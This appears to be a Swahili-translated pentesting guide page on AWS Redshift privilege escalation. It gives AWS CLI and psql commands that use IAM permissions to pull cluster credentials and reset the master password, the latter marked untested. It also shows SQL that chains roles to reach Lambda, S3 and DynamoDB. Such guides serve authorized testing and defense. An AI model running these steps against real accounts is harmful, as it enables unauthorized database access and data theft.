AWS - Redshift Privesc

Reading time: 4 minutes

Redshift

Kwa taarifa zaidi kuhusu RDS, angalia:

AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

Kwa ruhusa hizi unaweza kupata taarifa za clusters zote (ikijumuisha jina na cluster username) na kupata credentials za kuingia:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Potential Impact: Kupata taarifa nyeti ndani ya databases.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

Kwa ruhusa hizi unaweza kupata taarifa za cluster zote na credentials za kuingia.
Kumbuka kwamba user wa postgres atakuwa na permissions that the IAM identity iliyotumika kupata credentials inazo.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Athari Inayoweza Kutokea: Kupata taarifa nyeti ndani ya hifadhidata.

redshift:DescribeClusters, redshift:ModifyCluster?

Inawezekana kubadilisha nenosiri kuu la mtumiaji wa ndani postgres (redshit) kutoka aws cli (Nadhani hizi ndio ruhusa unazohitaji lakini sijazijaribu bado):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Athari Inayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

Kufikia Huduma za Nje

Zaidi ya hayo, kama explained here, Redshift pia inaruhusu kuunganisha roles (mradi ile ya kwanza inaweza assume ile ya pili) kupata upatikanaji zaidi lakini kwa kutenganisha zao kwa comma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, inawezekana call a lambda function from redshift na kitu kama:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, inawezekana kusoma na kuandika katika S3 buckets:

# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, inawezekana kupata data kutoka dynamodb:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

EMR

Angalia https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html

Marejeo

• https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a